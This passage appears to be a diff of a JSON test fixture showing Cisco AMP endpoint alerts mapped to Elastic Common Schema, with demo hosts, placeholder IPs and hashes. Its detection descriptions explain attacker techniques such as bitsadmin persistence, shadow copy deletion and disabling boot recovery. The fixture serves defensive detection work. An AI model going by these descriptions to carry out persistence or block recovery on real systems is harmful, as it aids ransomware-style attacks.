is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894" + } + }, + "@timestamp": "2021-01-14T10:05:50.000Z", + "file": { + "name": "WScript.exe", + "path": "/C:/Windows/System32/WScript.exe", + "hash": { + "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701355274Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:05:50.000Z", + "action": "Cloud IOC", + "id": "1521138739846959000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] 
+ }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.WScriptLaunchedZippedJS.ioc", + "description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + } + }, + "@timestamp": "2021-01-14T10:04:56.000Z", + "file": { + "name": "vssadmin.exe", + "path": "/C:/windows/system32/vssadmin.exe", + "hash": { + "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701357412Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:04:56.000Z", + "action": "Cloud IOC", + "id": "1494576726048000300", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "@timestamp": "2021-01-14T10:04:49.000Z", + "file": { + "name": "cmd.exe", + "path": "/C:/windows/system32/cmd.exe", + "hash": { + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:32:35.701359314Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:04:49.000Z", + "action": "Cloud IOC", + "id": "1494576727672000300", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.BCDEditDisableRecovery.ioc", + "description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8" + } + }, + "@timestamp": "2021-01-14T10:03:40.000Z", + "file": { + "name": "report.pdf.exe", + "path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "hash": { + "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701361216Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:03:40.000Z", + "action": "Cloud IOC", + "id": "1458617561791000300", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + 
"short_description": "W32.FakeExtensionExec.RET", + "description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "file": { + "hash": { + "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Quarantine Failure", + "ingested": "2021-09-12T17:32:35.701363103Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "id": "6880587034675643000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object path not found", + "error_code": 3221225530 + }, + "detection_id": "6880587034675642558", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "file": { + "hash": { + "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Quarantine Failure", + "ingested": "2021-09-12T17:32:35.701365008Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "id": "6880587034675643000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object path not found", + "error_code": 3221225530 + }, + "detection_id": "6880587034675642558", + "event_type_id": 2164260880 + } + }, + "tags": [ + 
"preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "file": { + "hash": { + "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Quarantine Failure", + "ingested": "2021-09-12T17:32:35.701366987Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "id": "6880587034675643000", + "kind": "alert" + }, + 
"cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object path not found", + "error_code": 3221225530 + }, + "detection_id": "6880587034675642558", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "file": { + "hash": { + "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Quarantine Failure", + "ingested": "2021-09-12T17:32:35.701368848Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "id": "6880587034675643000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object path not found", + "error_code": 3221225530 + }, + "detection_id": "6880587034675642558", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "file": { + "hash": { + "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Quarantine Failure", + "ingested": "2021-09-12T17:32:35.701370740Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "id": "6880587034675643000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object path not found", + "error_code": 3221225530 + }, + "detection_id": "6880587034675642558", + "event_type_id": 2164260880 + } + }, + "tags": [ + 
